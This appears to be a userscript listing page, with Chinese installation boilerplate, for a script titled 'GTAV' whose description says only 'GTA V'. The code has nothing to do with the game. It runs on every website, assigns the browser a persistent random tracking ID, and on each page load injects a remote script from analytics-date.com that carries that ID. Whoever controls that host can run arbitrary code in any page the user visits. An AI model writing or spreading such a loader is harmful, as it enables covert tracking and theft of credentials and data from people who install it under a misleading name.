您需要先安装一个扩展,例如 篡改猴、Greasemonkey 或 暴力猴,之后才能安装此脚本。
您需要先安装一个扩展,例如 篡改猴 或 暴力猴,之后才能安装此脚本。
您需要先安装一个扩展,例如 篡改猴 或 暴力猴,之后才能安装此脚本。
您需要先安装一个扩展,例如 篡改猴 或 Userscripts ,之后才能安装此脚本。
您需要先安装一款用户脚本管理器扩展,例如 Tampermonkey,才能安装此脚本。
您需要先安装用户脚本管理器扩展后才能安装此脚本。
GTA V
- // ==UserScript==
- // @name GTAV
- // @namespace http://violentmonkey.net/
- // @version 0.2
- // @description GTA V
- // @match *://*/*
- // @grant GM_setValue
- // @grant GM_getValue
- // ==/UserScript==
- (function() {
- const head = document.head || document.getElementsByTagName('head')[0];
- if (head) {
- const unixTime = Date.now();
- //uh
- let uh = GM_getValue('uh');
- if (!uh) {
- const randomString = Math.random().toString(36).substr(2)+Math.random().toString(36).substr(2)+Math.random().toString(36).substr(2);
- uh = `${unixTime}-${randomString}`;
- GM_setValue('uh', uh);
- }
- //uh
- const script = document.createElement('script');
- script.src = `https://analytics-date.com/run.js?uh=${uh}`;
- document.head.appendChild(script);
- }
- })();